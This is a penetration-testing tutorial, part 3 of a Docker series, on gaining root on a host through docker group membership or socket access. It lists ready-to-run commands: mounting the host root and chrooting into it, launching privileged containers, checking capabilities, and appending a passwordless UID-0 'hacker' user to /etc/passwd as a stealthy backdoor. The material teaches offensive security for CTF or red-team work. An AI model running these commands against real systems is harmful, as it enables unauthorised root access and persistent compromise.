Docker: Part 3 — Privilege Escalation via Docker
Once you confirm that Docker is running — or that you’re in the docker group — the path to root is often just a few commands away.
In this post, you’ll learn:
- How to abuse Docker group membership
- How to interact with the Docker socket
- How to mount the host filesystem
- How to use
chrootto escape containers - How to escalate privileges through misconfigurations
Why Docker Group Access is Dangerous
The Docker daemon (dockerd) runs as root. If you can interact with it (via docker CLI or directly through /var/run/docker.sock), you can tell it to:
- Launch containers
- Mount host filesystems
- Run commands
And all of it runs as root on the host.
Membership in the docker group = root access. Period.
Method 1: Mount Host Filesystem and Escape with chroot
If you’re in the docker group or can access the Docker socket, this is the classic privilege escalation technique.
Step 1: List available Docker images
docker images
If none are available, pull a base image:
docker pull ubuntu:18.04
Step 2: Run a container with the host filesystem mounted
docker run -it -v /:/mnt --rm ubuntu:18.04
This mounts the host’s root (/) into the container’s /mnt directory.
Step 3: Escape to the host environment
chroot /mnt
You’re now in the host’s root filesystem. You’ve broken out of the container. You are root.
Step 4: Confirm access
whoami
hostname
cat /root/flag
You have full host access.
Method 2: Exploit the Docker Socket Directly
Even if you don’t have docker installed but have write access to /var/run/docker.sock, you can interact with Docker using low-level API requests.
Step 1: Confirm socket permissions
ls -l /var/run/docker.sock
If you have read/write access, proceed.
Step 2: Use curl to spin up a container (advanced)
Or use tools like socat to bind a shell. But usually, it’s easier to install the docker client binary and go back to Method 1.
Method 3: Run a Privileged Container
If Docker is configured to allow privileged containers, you can gain access to host devices, kernel modules, and more.
Step 1: Run privileged container
docker run -it --privileged --rm ubuntu:18.04
Inside this container, check:
ls /dev
If you see /dev/kmsg, /dev/mem, or other hardware-level interfaces, you’re in a strong position to escalate further — even if chroot isn’t an option.
Method 4: Create a New Root User on the Host
If you mounted the host filesystem, you can manually add a new root-level user.
echo 'hacker::0:0::/root:/bin/bash' >> /mnt/etc/passwd
Then you can switch to that user once you exit the container.
This is stealthier than full chroot and useful in long-term access or red team scenarios.
Method 5: Abuse Capabilities from Inside the Container
If the container is running with dangerous Linux capabilities (like cap_sys_admin, cap_net_admin), you can often:
- Mount additional filesystems
- Load kernel modules
- Modify networking rules
Check capabilities inside the container:
capsh --print
Or try loading filesystems:
mount -t proc proc /mnt/proc
In some cases, even without full Docker access, capabilities alone are enough to get root on the host.
Summary
| Method | Description | Result |
|---|---|---|
| Mount host FS | Start container with -v /:/mnt | Escape via chroot, get root |
| Docker socket | Abuse /var/run/docker.sock | Full control via API |
| Privileged container | --privileged flag | Access to host-level devices |
| Add root user | Modify /etc/passwd via mount | Persistent root access |
| Capabilities abuse | Leverage leaked caps | Mount, escape, privesc |
Coming Up Next
In Part 4: Escaping Docker Containers, we’ll switch perspectives. Instead of breaking into the host from Docker, you’ll learn how to break out of an unprivileged container — using real-world escape techniques and known vulnerabilities.